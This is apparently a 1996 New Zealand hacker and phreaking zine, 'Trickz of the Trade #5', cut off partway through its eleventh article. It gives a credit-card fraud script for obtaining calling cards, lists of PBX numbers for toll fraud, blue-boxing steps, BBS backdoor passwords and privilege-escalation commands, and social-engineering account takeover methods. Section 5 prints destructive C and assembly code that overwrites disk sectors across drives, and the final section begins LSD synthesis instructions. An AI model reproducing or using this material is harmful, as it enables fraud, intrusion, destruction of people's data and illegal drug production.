_ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _
|o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| -





















      
                              
                                  ÜÜÛß ßÛÜ           
                                Ü²ß   ÞÝ ß²Ü         
                               ²²    °ÝÞÝ  ²±
                              ±²    °Ý Þ°   ±±       
                             Þ±Ý   ±°   ±°   ±°  ÜÜ  
                             ±±   Þ°Ý   °±  ÜÜÜßß
                            Þ°Ý   °Þ    Þ°Ýß Þ°Ý     
                            Þ°Ý  Þ±ÝÜÜßß ±±   °±     
                            ÜÜÜßß±±      Þ±Ý  ±°     
                        ÜÜßß Þ° Þ²Ý       ²±  Þ±     
                              ±Ý²²        Þ²Ý ±Ý     
                               ²²Ý         ²²Ü°       
                                Û ÝÜÜ    ÜÜÞ²±        
                               ÞÝ  ßß±° ±ßß Û          
                               Þ            Þ          









         ______    ________  ___    ____      __ ____          ___
     __./_____/_ _/ ___   /./   \ ./    \__ ./ _\__ /__   _____\  \
     _/:/______//_  \  __/ |     \|  \___\ \| /_____   \./  _______\
       :____/    l___\_____l______l_________l_____\ ____l_____\
                               ______  ________ __        .___    ______
                           __./_____/_/ ___   // _\__   __|___\ ./__   /_
            of   the       _/:/_______  \  __/. /    \./ ____/ \|  /__/  \
                             :____/  l___\____ /______l_________l_________\
     ---------------------------------------/________\---------------------

                     - --×  trickz of the trade #5!  ×-- -




























   
                       --=\ mORAL oF tHE sTORY /=--
                           `----dISCLAIMER----'

    tHIS zINE wHICH wE cALL tRICKZ oF tHE tRADE iS oNLY fOR iNFORMATIONAL
    pURPOSEZ oNLY,. sO iF yOU dECIDE tO uSE tHE iNFORMATION, gO aHEAD iTZ
    a fREE wORLD *bUT* iF sOME cOMPANY fUCKZ yOU oVER bIG-tIME tHEN tHATZ
    yOUR fAULT nOT mINE, sO jUST bECAREFUL wHAT yOU dO aND wHAT yOU sAY!!

    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---
    ---+*IT'S YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR OWN ASS*+---























             ___________ _______________
          . /~~~~~~~~~~/`               `.
                      /                   .
                     (                    !
                      \  _________,       |
                       \_/        !       |
                   ____.'         |       |
                 //               |       |
                 /                |       |
                .                 |       |
                                  |       |  
                                  |       |
                                  |       `
                                  '        `--.
                                 '             \
                                :   o9/o9/96    .
                                |  .        .   !
                                |  |  !  !  |'  '
                                |  |  |  |  |  /
                                `--|__|__|  |-'
                                         |  |
                                         |  |
                                         !__|






















                              ÜÜÜÛÛÛ²²²±±±°°
                          ÜÜÛÛ²²²±±±°°°
                        ÜÛ²²±±°°
ÜÜÜÜÜÜ                ÜÛ²±°                     ÜÜÜÜÜÜÜ                   ÜÜÜÜÜ
±±±±±±ÛÛÛÛÛÛÛÛÜÜÜÜ   Û²±°                    ÜÛÛßß   ßßÛÛÜ    ÜÜÜÜÛÛÛÛÛÛÛÛ±±±±±
°°°°°°±±±±±±±±±±±±ÛßÜÜÜÛÛÛÛÛÛÜÜÜ          ÜÛÛß          Û±° ÛÛ±±±±±±±±±±±±°°°°°
      °°°°°°°°°°° ÜÛÛßß      ßßßÛÛÛÜÜÜ ÜÜÛÛß             °  ±±°°°°°°°°°°°°
                 °ÞÛ               ßßßÜßß                °  °°
                  ÛÛÛÜ     ÜÜÜÜÜÜÜßÛÛßÜßÛ²ßÛÜÜÜÜÜÜ     Ü²±°
                 ÞÛÛÛÛÛÛÛÛÛ²²±±°° ÞÝ ÜÛÜ Þ²±°ÛÛÛÛÛÛÛÛÛÛÛÛ²±°
                 ÞÛÛÛÛ²²±±°°  ÜÜÛÛÛÛ²± ÛÛ²±°   ßßßÛÛÛÛÛÛÛ²±°
                  Û²±°°     ÜÛÛÛÛÛÛÛ²± ÛÛ²²±±°  °    ßßÛ²±°
                   ß   °° ÜÛÛÛÛÛÛÛÛ²±  ß Û²²±±°    °°°
                         ÜÛÛßßßÜÜÜ Þßß ÛßÜ ÜÜÜ   °  °
                         ÜÜ Ûß Þ±   ß  Þ   ß±  Ûß ÜÜ
                         Þ±     ß           ß     Þ±
                          ß    c o n t e n t z    ß
                
                       1.. SCENE NEWZ               ][yPe     
                       2.. HOW TO HYPNOTiZE         jON       
                       3.. PREMiER WORLD LiNK       ][yPe     
                       4.. HACKiNG iNiQUiTY         Ceo       
                       5.. NASTY STUFF              Ceo       
                       6.. OLD BACKDOOR'Z           Micro     
                       7.. BLUE-BOXiNG iN NZ        ][yPe     
                       8.. PBX'Z FOR FREE           aNoNyMoUs       
                       9.. HACKiNG /X               oPium     
                       10. BACKDOOR iN dESiRE       ][yPe     
                       11. MAKiNG REAL LSD          aNoNyMoUs      
                       12. ACiD LANDMiNE            PoSCa     
                       13. TRiPPiN'CHEEP            oPium
                       14. HOW TO RiP OFF CARZ      cRomm     
                       15. JAP CRAP                 bAD L
                       16. 7 LiTTLE POSTiES         StiGZ
                       17. CARDPHONE PHUN           ][yPe
                       18. VMB/PBX/BBS #'Z          GreyRat
                       19. GREET'Z                  ][yPe
                       20. LAST WORD'Z!             ][yPe
                                                                   
                                                                  
            
            
            
            
            
            
            
            
            
            
            
            

-----------------------------------( 1 )------------------------------------
                                SCENE NEWZ!

---------------------------------by ][yPe!----------------------------------

  Sorry dewdz, i havent really been listenin to the latest gossip and whot
  i already know is a bit old now, so i will have to do a big gossip page
  for tot 6..


-----------------------------------( 2 )------------------------------------
                             HOW TO HYPNOTiZE!

----------------------------------by jON!-----------------------------------

  Take a deep breath through your nose and hold it in for 8 seconds. Now,
  through your mouth, exhale completely and slowly. Continue breathing long,
  deep, breaths through your nose and exhaling through your mouth.  Tense up
  all your muscles very tight, now, counting from ten to one, release them
  slowly, you will find them very relaxed.  Now, look at my eyes, as
  you look at them, with every breath and passing momement, you are feeling
  increasingly more and more peaceful and relaxed.  
  As you look at it i will count from 100 down, as a count, your eyes will
  become more and more relaxed, getting more and more tired with each
  passing moment."
  Count from 100 down to 0 and every so often say "your eyes are very tired, 
  they are very relaxed, every number i say makes them more relaxed and more 
  tired"
  when you reach 70 say "you may close your eyes at any time"
  when ya reach 0 pause for a bit and then say.
  As you lie (or sit) here with
  your eyes comfortably close you find yourself relaxing more and
  more with each moment and breath.
  The relaxation feels pleasant and blissful so, you happily give way to
  this wonderful feeling. Imaginge your lying in bed at night, resting 
  peacefully, with a soft pillow under your head.  A tingling sensasion begins
  to work its way, within and without your toes, it slowly moves up your
  feet, making them warm, heavy and relaxed. The cloud is soft and supports
  your body with its soft texture, the scene is peaceful and absorbing,
  the peacefulness absorbs you completely... 
  The tingling gently and slowly moves up your legs, relaxing them.
  Making them warm and heavy.  The relaxation feels very good, it feels so
  good to relax and let go. As the tingling continues its journey up into
  your solar plexus, you feel your inner stomach become very relaxed.  Now,
  it moves slowly into your chest, making your breathing relaxed as well.
  The feeling begins to move up your arms to your shoulders, making your arms
  heavy and relaxed as well.  You are aware of the total relaxation you are
  now experiencing, and you give way to it.  It is good and peaceful, the
  tingling now moveves into your face and head, relaxing your jaws, neck, and
  facial muscles, making your cares and worries float away. Away into the
  blue sky as you rest blisfully in your bed....
  You now find yourself in a hallway, the hallway is
  peaceful and nice. As i count from 10 to 1 you will imagine yourself
  walking further and further down the hall. When i reach one you will find
  yourself where you want to be, in another, higher state of concious and
  mind. 
  Now, count down from 10 to 1 slowly
  you feel a strange sensation in your right arm, the
  feeling begins at your fingers and slowly moves up your arm, as it moves
  through your arm your arm becomes lighter and lighter, it will soon be so
  light it will lift up into the air.. 
  Becoming lighter and lighter which each breath and moment...
  Now it is time to have some fun, say the following..

  When i say the command "awake" you will open your eyes and act as if you were 
  wide awake, talking, responding etc. When i give the command "sleep" you will 
  instantly close your eyes and drift off to sleep.
  Now you can give command for when they awake.. Such as

  when i next waken you, you will believe you are flying, when you walk, you
  will think you are flying through the air, you will enjoy this experience
  but you will not actually try to fly, and you will not harm yourself in 
  any way, you will avoid obstacles instead of trying to fly over them
  when i give the command "return" you will return to where you were sitting
  and when i give the command "sleep" you will drift off, back into a totally
  relaxed state of sleep.
 
  !!!Warning!!!
  Do not omit any of the commands written above as the subject may harm 
  themsleves if you neglect to follow this warning..

  As i count from 1 to 5 you will
  find yourself becomming more and more awake, more and more lively.  When
  you wake up you will find yourself completely alive, awake, and refreshed.
  Mentally and physically, remembering the pleasant sensation that hypnosis
  brings...  Waking up feeling like a new born baby, reborn with life and
  vigor, feeling excellent. Remembering that next time you enter hypnosis it
  will become an ever increasing deeper and deeper state than before.
  1- You feel energy course throughout your limbs.
  2- You begin to breathe deeply, stirring.
  3- Begining to move more and more your eyes open, bringing you up to
     full concious.
  4- You are up,up, up and awakening more and more.
  5- You are awake and feeling great."


-----------------------------------( 3 )-----------------------------------
                            PREMiER WORLD LiNK!

---------------------------------by ][yPe!---------------------------------

  What is PWL???
  ~~~~~~~~~~~~~~
  Its like MCi/SPRiNT/AT&T which requires a CallingCard account if you
  want to make call's around the world., But it's easier to HACK cardz
  and you could make lots and lots of PWL cards if you have got g00d
  connections which can supply you cREDITcARDZ :)

  If you want to make a pwl card you must do a bit of social engineering
  and talk voice with the operator and pretend you are that person that
  owns the CreditCard (which you are going to use) 

  How do i make PWL cardz???
  ~~~~~~~~~~~~~~~~~~~~~~~~~~
  diAL 0800-447-300 (NZ)

  Press '0' at prompt..

  Say to the op "Hi i would like to inquire a card for your service"
 
  If the operator asks "Ok, where did you hear about our service"
  Reply "British Airlines" and that will get you through!

  The operator will ask if you like to charge the Premier World Link
  card to your creditcard.. Reply "Yes.. I have a VISA" (or whatever
  kinda creditcard you are using)

  The operator will ask for the following...

  CREDIT CARD # (MUST BE VALID)
  EXPIRY (MUST BE VALID)

  Full Name (REAL)
  Address (REAL - From the cc)
  phone number (REAL)
  d.o.b (REAL)

  .-----------------------------------------------------------------------.
  |+ It use to be easier and you could make up all the detail's but use  +|
  |+ a real creditcard # and expiry.. But the security is much tighter   +|
  |+ now so they will ring the bank to make sure your card details arent +|
  |+ FAKE and all made up!!!                                             +|
  `-----------------------------------------------------------------------'

  Now the operator will ask you to pick 4 digits for your PIN# thats if
  you decided to make your own PIN# rather than the operator making one
  up for you..

  Now they will ask you for a SECURITY PASSWORD..

  Once they say your card is ready to use.. Choose a SECURITY PASSWORD
  example: LIMO - They normally ask for your Mother's Maiden name but
  just make one up again.. example: SHANON

  Thats it so now hangup and ring back and your card should be ready..
  If they tell you that the card will be ready within the next 24hours
  that mean's they need to check your card and if it goes through ok
  the card will be ready in 24hours like they say..

  How do i use PWL???
  ~~~~~~~~~~~~~~~~~~~
  diAL PWL AXX # 
  diAL (14-digit) card
  diAL 011-CC-AREA-NUMBER

  If you wait and listen you will hear your optionz..
  One of them is to make Conference callz, but the line feed sux
  so dont worry bout this one, unless your desperate! :)

  What are some of the PWL AXX #'s???
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  0800447300     [NZ]
  18007251000    [USA]
  0800892143     [ENGLAND]
  020797242      [SWEDEN]
  1800123197     [AUSSIE]
  0130817232     [GERMANY]
  18008647000    [CANADA]
  167872569      [ITALY]

  Hav Phun dewdz!


-----------------------------------( 4 )------------------------------------
                             HACKiNG iNiQUiTY!

----------------------------------by Ceo!-----------------------------------

  Well i've sort of stayed quite off the hpa side of things for a while
  now because of telecum being after me.  The last couple of months have
  brought a few new things to mind tho.  the first and foremost being
  a HUGE bug in Iniquity which allows any user to gain 255 security just
  by entering a string in the chat screen.

  eg.

  sysop> hang on i got another call be back in a sec
  user> /acs 255
  user> /c <or whatever it is to clear the screen> or even /q to quit.

  I've probably been more active with nZPD which is ak's premier couriering
  group.  I've also been doing a little coding.  But most of my time's been
  taken up with work for tech.


-----------------------------------( 5 )-------------------------------------
                                NASTY STUFF

----------------------------------by Ceo!-----------------------------------

Coding

Don't you hate it when something has a delay in it?  I know it pisses me
off.  Most people just wait for some hot shot coder to write a patch to
remove the delay.  eg. emo's nodelay program.  But here's where you learn
how to do it with hardly any effort at all.

for a start this will only work with the normal/default delay functions of
pascal.  Well thats all i've tested it on anyway.

Pascal

To remove a delay in a program coded in pascal all you have to do is load
up your trusty hex editor.  I use XTG coz its fast and easy to use.  You
can use debug or sumfin else, like hex workshop.  Whatever suits you.

all you need to do is search for the bytes

e2 f6

and change them to either

eb 00                   ; jumps past the bit that delays it

or

90 90                   ; nop's it out.
                        ; this can be dangerous.  i reccomend the first
                        ; method

if your a lazy bugger tho and you can't be fucked doing any of this
you can get Emo's cool little program NODelay which removes generic delays
in pascal and other programs.  Contact Emo on many of ak's best bbs's

Nasty stuff

Well i know some of you people would love to destroy someone's computer
so here is a very simple way of doing it.  All you need is a c or c++
compiler.

the function needs the dos header.

#include <dos.h>

// here is the function

void df(int drive)
{
  unsigned char buf[1024]               //declares the buffer array
  int i                                 

  for (i = 0; i < sizeof(buf); i++) {   //fill the buffer with 0's
     buf[i] = 0;
  }

  abswrite(drive,2,0,&buf);             // overwrite the first 2 sectors
}                                       // of the drive specified with 0's

well thats one mean/cheap and nasty way of doing it.  here comes another
one or two this time written in pascal/asm.

procedure df(drive:byte);

{ Purpose: to fuck up a specified drive
  pass to: the drive number to be fucked
  returns: none
}

begin
  asm
    mov al,9               (* write entire track      *)
    mov ch,0               (* specify track           *)
    mov cl,0               (* and sector              *)
    mov dh,0               (* specify side            *)
    mov dl,drive           (* drive 0=a, 1=b, 2=c etc *)
    push ds                (* point es to proper      *)
    pop es                 (* segment address         *)
    mov bx,es              (* offset of buffer area   *)
    mov ah,3               (* specify service 3       *)
    int 13h                (* BIOS disk interrupt     *)
  end;
end;

well here is another way of destroying disks..  this one uses dos's int 26h
to write from sector 0 to 255..

prodedure destroydisk;

{  Purpose: To destroy disks of course
   Pass to: none
   Returns: none
}

var buffer:string;

begin
  buffer:='This HDD is now Fucked';
  asm
      mov al,2                  (* starting drive to be destroyed *)
    @start:
      mov dx,0                  (* starting sector *)
      mov cx,255                (* destroy 255 sectors *)
      mov bx,offset ds:buffer   (* point bx to the stuff to write *)
      int 26h                   (* Lets FUCK SOME DISKS! *)
      pop dx                    (* clean up stack *)
      jc @error
    @error:
      inc al                    (* do the next drive *)
      cmp al,26                 (* destroyed all drives? *)
      je @exit                  (* yep there all fucked ;-) *)
      jmp @start                (* nup.. still got more to go.. *)
    @exit:
  end;
end;

keep in mind that none of the above code has been tested so it is highly
likely that some or all of it may not work.  its upto you to test it and
remove any bugs.

Disclaimer

The author of this article writes it for the purpose of being informative
and no other.  This is for your information only and the author will not
be held liable for any damages direct, indirect, sercumstantial, or
otherwise resulting from the use or distribution of this information.

The author accepts no responsibility for any of the information in this
article.

contacting the author

the author may be contacted via demi-monde network or by leaving e-mail
on most fine ak bbs's.


-----------------------------------( 6 )------------------------------------
                              OLD BACKDOOR'Z!

---------------------------------by Micro!----------------------------------
  
 tHiS oNE iS fOr Ya bbS hAkErz OUt ThEre:
 BAcKDooRZ..

                               _oBLiVioN/2_
                     "HeyYouGuys" from the Main Menu
                     "FuckYouCunt" from the Main Menu
                     "Deadwood" from the File Menu
                     "IndiansRule" from the Msg Menu

                                _ViSioN/2_
                     "Vision-X-Blows" from the Matrix Menu
                     "ClingOnToMe" from the File Menu
                     "SuckMeHard" from the File Menu
                     "GoToDos" from the File Menu

                                 _ReNeGAde_
                     "//King Cott" from the Main Menu
                     "//King Fisher" from the Main Menu

                                 _ViSioN-X_
                     "WeHateThieves!" from the Matrix Menu
                     "AccessPlease" from the Matrix Menu
                     "BrakeThe_Rulez!" from the File Menu
                     "OpenSesame" from the File Menu
                     "PieceOfCake" from the File Menu

  
-----------------------------------( 7 )------------------------------------
                             BLUEBOXiNG iN NZ!

---------------------------------by ][yPe!----------------------------------

  INFORMATIONAL PURPOSES ONLY.. DONT FUCK WITH THIS SHIT UNLESS YOU
  HAVE ALREADY HAD EXPERIENCE, I DONT WANT THE WHOLE NZ START BOXING
  JUST COZ THIS INFO GOT OUT,, AND IF YOU HAVE ANY QUESTIONS DONT ASK! 

                               Blue-Boxing 
                               ~~~~~~~~~~~
  Im not here to tell you the history of boxing or how satelite dishes
  help us to get free callz around the globe.. Im here to tell you the
  essence of boxing and how to do it in NZ!

  HEY! NO TRUNX ARE INCLUDED IN THIS ARTICLE, SO SCAN THEM YOURSELF!!!
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Letz get started!.. Now all you need is 4 things

  Phone     (I prefer Cordless)
  Earphones (Sony/Panasonic)
  Scavenger (Latest Version)
  Terminate (Latest Version)

  StEP1> Load up Terminate.. type ATX (enter) ATD (dont press enter yet)

  StEP2> Press ALT-F (Terminate File Manager)

  StEP3> Load up Scavenger from whatever directory you have it in

  StEP4> Pick up the phone and dial the HCD (Home Country Direct) #
         you wish to break or scan.

  StEP5> Put the 1 Earphone up to the Mouth Piece and when you hear the
         operator talk, press '+' on the Numeric Keypad

  StEP6> If you get 2/3 quick beeps, and then it goes clear..

  StEP7> Press 'Enter' on the Numeric Keypad and it will dial the # you
         have selected on the dialing list

  StEP8> Quickly press 'Esc' twice (not too fast) and hit 'Enter'

  StEP9> Quickly HANG UP the phone and the modem will take it from here!

  tIPZ: If you can break, but it keeps hanging up on you try changing
  ~~~~~ your delay frequency it helps..

        If you cant break on the operator try breaking before the op
        picks up.. eg: when you dial the HCD# you sometimes hear 2 or
        3 clicks, bring on the last click you hear

        Dont talk to the op, hang up if you cant break the line

        If you cant break any country's use scav's FREQ-SCANNER

        While you dial eg: b-1-0-3035483-c and just half way you hear
        the line beep and dies.. Lower the dialing volume (PG-DOWN)
        try, between 51 and 57

        If you come across a HCD which doesnt click, beep twice, this
        mean's you have either come across a filtered line or it's c7
        and it's virtually impossible to break!

        When you manage to break a line! KEEP IT TO YOURSELF, Dont tell
        anyone! because if your the only one using it then it will last
        MUCH longer and it will be a better line.

        Have phun, and dont tell anyone you box.. I dont box.. I just
        know how it worx and i have many textfiles on boxing in overseas
        country's.. but anyway.. Dont get caught..

  Next time, I will include how to BlueBox with Chicken Dialer on the amiga
  and i might tell you some secrets i have learned from boxing and also how
  to become a kewl box-phreak :) 


-----------------------------------( 8 )------------------------------------
                              PBX'Z FOR FREE!
  
-------------------------------By aNoNyMoUs!--------------------------------

hEY mUTHA fUCKA..
1ST oF aLL lET mE jUST sAY

"fUCK OFF TELECOM"

eNJOY tHESE nUMBER'S wHILE tHEY LAST :]
iF aNY pBX dIE'S uSE tONELOC aND sCAN fOR nEW oNE'S!!!

nATIONAL pBX'S
`-`-`-`-`-`-`-
[WGTN] 04-5765999
uSE aFTER 6PM, pRESS hASH (#) tWICE, dIAL: 1,cC,nUMBER,hASH
[WGTN] 04-4741068 dIAL aFTER tONE
[CHCH] 03-3720600 dIAL aFTER tONE
[AKL]  09-3029224 dIAL aFTER tONE

gLOBAL pBX'S (tOO-eLEET-mUST-SCAN!)
`-`-`-`-`-`- 
[WGTN] 04-388SCAN
[WGTN] 04-527SCAN
[WGTN] 04-802SCAN
[CHCH] 03-372SCAN
[CHCH] 03-373SCAN
[HST]  06-878SCAN
[OTK]  06-364SCAN
[AKL]  09-258SCAN
[AKL]  09-256SCAN
[AKL]  09-579SCAN

nATIONAL pBX'S - bIGGER lISTING..
(sOME aRE dEAD)

[WGTN]

474-0861
474-0862
474-0863
474-0864
474-0865

474-7635
474-7618 
474-7620 
474-7607 
474-7629 
474-7605
474-7622

[AKL]

302-9000
302-9001
302-9003
302-9004
302-9005
302-9008
302-9009
302-9010
302-9011
302-9012
302-9013
302-9014
302-9015
302-9017
302-9018
302-9020
302-9021
302-9022
302-9023
302-9025
302-9029
302-9031
302-9032
302-9033
302-9034
302-9035
302-9036
302-9037
302-9038
302-9039
302-9040
302-9040
302-9041
302-9042
302-9043
302-9044
302-9045
302-9046
302-9047
302-9048
302-9049
302-9101
302-9102
302-9103
302-9104
302-9105
302-9107
302-9108
302-9109
302-9110
302-9110
302-9111
302-9112
302-9113
302-9115
302-9116
302-9117
302-9118
302-9119
302-9120
302-9122
302-9123
302-9124
302-9125
302-9126
302-9127
302-9129
302-9130
302-9131
302-9132
302-9134
302-9135
302-9136
302-9137
302-9138
302-9139
302-9140
302-9141
302-9142
302-9143
302-9144
302-9145
302-9146
302-9147
302-9148
302-9149
302-9150
302-9151
302-9152
302-9153
302-9154
302-9155
302-9156
302-9157
302-9158
302-9159
302-9160
302-9161
302-9162
302-9163
302-9164
302-9164
302-9165
302-9166
302-9167
302-9168
302-9169
302-9170
302-9171
302-9172
302-9173
302-9174
302-9175
302-9175
302-9177
302-9178
302-9179
302-9180
302-9181
302-9183
302-9185
302-9187
302-9188
302-9189
302-9190
302-9190
302-9191
302-9192
302-9193
302-9194
302-9195
302-9195
302-9196
302-9199
302-9200
302-9200
302-9201
302-9202
302-9205
302-9206
302-9208
302-9209
302-9211
302-9212
302-9213
302-9216
302-9217
302-9223
302-9224
302-9225
302-9226
302-9227
302-9227
302-9229
302-9230
302-9232
302-9233
302-9236
302-9238
302-9239
302-9242
302-9243
302-9244
302-9245
302-9246
302-9247
302-9249
302-9252
302-9258
302-9259
302-9260
302-9261
302-9262
302-9263
302-9264
302-9265
302-9266
302-9267
302-9269
302-9270
302-9271
302-9272
302-9273
302-9274
302-9275
302-9276
302-9277
302-9278
302-9279
302-9280
302-9281
302-9282
302-9284
302-9285
302-9287
302-9288
302-9290
302-9291
302-9292
302-9293
302-9294
302-9295
302-9296

[CHCH]

372-0001
372-0036
372-0305
372-0309
372-0310
372-0324
372-0325
372-0336
372-0345 
372-0502
372-0503
372-0514
372-0515
372-0517
372-0520
372-0524
372-0531
372-0532
372-0538
372-0552
372-0559
372-0571
372-0573
372-0578
372-0579
372-0599
372-0600 
372-0602
372-0605
372-0613
372-0614
372-0618
372-0622
372-0629
372-0658
372-0685
372-0689
372-0698
372-0819
372-0820
372-0837 
372-0848
372-0912
372-0918
372-0919
372-0937
372-0945
372-0947
372-0950
372-0952
372-0972
372-0980
372-0995
372-0997
372-1102
372-1103
372-1132
372-1161
372-1173
372-1208
372-1209
372-1223
372-1224
372-1226
372-1233
372-1236
372-8299

pBX tIPS
`-`-`-`-

[*] dONT sPREAD tO lAMERS
[*] dONT rING tHE sAME # aLL tHE tIME
[*] dONT aBUSE tHEM (uSING tO pRANK pEOPLE yOU HATE!)
[*] dONT uSE tHEM eVERYDAY
[*] dONT tELL aNYONE yOU uSE pBX'S
[*] dONT tRUST aNYONE
[*] dONT cOLLECT-cALL tO a pBX
[*] dONT uSE a pBX tO cALL bACK iNTO yOUR oWN aREA
[*] dONT mAKE tOO mANY vOICE cALL'S
[*] dONT rING tELECOM wITH pBX'S
[*] dONT sPEND mORE tHAN 30MIN'S eACH tIME!
[*] uSE fROM oTHER pHONE lINE'S
[*] uSE wHEN ITS iMPORTANT
[*] uSE dIFFERENT pBX'S iF pOSSIBLE eVERY cALL yOU mAKE
[*] hAVE pHUN!!!!!!!!!!!!!!!!!!
[*] aND.. dONT aBUSE tHE pBX!!!

aNoNyMoUs^96
[-7o7-]

-Ed: I must say this is for informational purposez only and the person
     that wrote this didnt spread it for people to start using pbx'ez!
     It's for your eyez not for your use, understand! so dont fuck with
     these otherwise its your risk and responsibility to save your own
     ass, ahahaa.. .

     Thanx anonymous - we couldn't do it without ya dewd
                     - Hey, next time can we include the global ones!
                     - I just hate it when ppl leave #'s out! :(


-----------------------------------( 9 )------------------------------------
                                HACKiNG /X!
  
---------------------------------by oPium!----------------------------------

  METHOD #1:

  Try to find someones account by using * (wildcards) and a prefix to
  a name, eg. SNO* .. when you have found the user re-login the bbs and
  keep password failing it until the sysop breaks in and asks you if he can
  help you with it.. So you just tell him you have completely forgotten
  your password and you cant remember because you've been smoking too much
  pot! =] Then you might get lucky and get the password from him!!

  METHOD #2:

  Login as a username + a " " or a danish or other country specified char
  that isn't used on that bbs..  The system thinks its a new account, and
  gives you axx to a limited conference .. (where others might still have
  access!!) - The sysop and users can only see the name (not the ' ' or
  sign).. Then you write a msg to another user (sysop) that got axx to that
  bbs. Tell that other user (sysop on another board) that you have forgotten
  your password at his board, then he sees your account name and not the
  ' ' or different signs and believes your the real guy, then he tells you
  the password and now you have the password to that users account on another
  board!!! (This can be fun, just becareful and dont target elite users!)


-----------------------------------( 10 )-----------------------------------
                             BACKDOOR iN dESiRE

----------------------------------by ][yPe!---------------------------------

  YoHo! Many of you must have seen dESiRE by now, Its just one of those
  silly /X clones which you get on the PeeCee!!!

  Im not a MASTER when it comes to hacking but atleast i know how to
  think like a hacker (keep that in mind)
  
  HACKiNG DESiRE V1.0 - REGiSTERED/SHAREWARE
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Ok.. All you need is a new-user account! Yes im fucking serious!
  Tho I recommend for all commands to work have a validated account.
  Just logon under whatever fuckin handle and info you wanna use
  and when you get to the main menu try the following

  1> v c:\*.*                           [view's the first file in c:\]
  2> v c:\bbs\data\users.dat *          [view the users.dat file]
  3> d c:\bbs\data\users.dat *          [download the users.dat]
  4> local c:\bbs\data\users.dat *      [put user.dat in the files area]
  5> d c:\warez\*.*                     [download all files in warez dir]
  6> f 1 *                              [view dir1 file list]
  7> n *                                [show new files in conf]
  8> a *                                [alter marked file flags]
  9> r *                                [read messages in conference]
 10> s *                                [show your statistics]
 11> t *                                [show the date and time]
 12> j 0 *                              [join sysop files area]
 13> l *                                [view the users list]
 14> q *                                [hide your node]
 15> ds *                               [sysop download]
 16> z *                                [zippy search] 
 17> m *                                [ansi/ascii screen mode]
 18> rl *                               [relogin the bbs]
 19> who *                              [shows node, name and location]
 20> x *                                [lamer mode on/off]

  MORE NFO ON COMMANDS
  ~~~~~~~~~~~~~~~~~~~~
  1.. This isnt very great, but its interesting for people that want to
      see the config.sys and autoexec.bat files etc in the c:\
      so for example you want to see the autoexec.bat, type:

      v c:\autoexec.bat *

  2.. eheh, this r0q0rz! just do it, coz the first person on the userlist
      which is normally the sysop will be shown to you.. yup! the passwd
      is before the phone# of the user!

  3.. I havent tried this one yet, but it will download the users.dat
      file which is believe it or not UN-CRYPTED! So you can see every
      users details.. name, passwd, addie, phone#, sent by line etc etc

  4.. This is a waste of time unless you want to prove to a user that
      any file from the hardrive can be put online.. or if you know
      the sysop's hd well and the directorys he has ,..example on his
      HD he has a file called CCARDZ.LOG in a directory PRIVATE..
      just type the following from the main menu:
  
      local c:\private\ccardz.log *

      It will ask which conf you want to put the file in..      
      And if you want to use FILE_ID.DIZ which is in the archive/text

  5.. If the sysop has a WAREZ directory all files can be leeched
      and only a one-liner command in the log's can show the sysop that!

  6.. This is only useful, if you have no axx to 'f' command..
      so try f 1 * , f 2 * etc etc..

  7.. To show the new files if you dont have axx to the cmd already.

  8.. Alter any files you have marked for downloading..
      Make sure you have a disabled ratio otherwise you will find
      it hard to get the files you want!

  9.. Read messages, Public msgs only.

 10.. Show your stats and your information!

 11.. Shows the date and time :)

 12.. Joining sysop conference with no axx! So you can see the private
      uploadz for the sysop.. Try J # * To join other conference's you
      dont have axx to!

 13.. Show you the user-list of the bbs

 14.. Hide your node? dunno wot this is really for.. But you cant see
      yourself when you type "WHO" and neither can the sysop

 15.. Im not sure how this one workz but i think if you have a RATIO
      and cant dload then this will leech anything you want?

 16.. Zippy search of files you are after

 17.. Change screen mode to Ansi/Ascii

 18.. Relogin the bbs, This is useful after you have discovered the sysops
      password..so instead of ringing back just do rl *

 19.. Show's your name, location and the node your logged onto

 20.. Lamer mode/expert mode

 -.-.-.-.-.-.-.-.-.-
 HAPPY HACKiN DEWDZ!
 -`-`-`-`-`-`-`-`-`-


-----------------------------------( 11 )-----------------------------------
                              MAKiNG REAL LSD!

--------------------------------by aNoNyMoUs--------------------------------

  LSD can be derived from the ergot alkaloids such as ergonovine,
  principal constituents of ergot, the grain deformity and toxic
  infectant of flour caused by the fungus of grasses, Claviceps
  purpurea. The microbial formation occurs over the hydroxyethylamide.

  LSD is produced by an anhydrous (water free) reaction between
  lysergic acid, trifluoroacetic acid, acetonitrile, and

  diethylamine.  The reaction time for the entire process requires
  from 2 to 3 days.  

  Lysergic acid is a psychomimetic under government control.  Lysergic
  acid and isolysergic acid are the main cleavage products formed on
  alkaline hydrolysis of the alkaloids which are characteristic of
  ergot. Morning-glory seeds can be used as a source for lysergic acid,
  1 kilogram (2.2 pounds) yields approximately 25 grams of lysergic acid
  amide which can be made to yield more than three grams of LSD.

  A solution of the mixed anhydride of d-lysergic acid (the levo [left]-
  rotating form is almost completely inactive and therefore useless
  as a starting material) and trifluoroacetic acid in 200 ml. of 
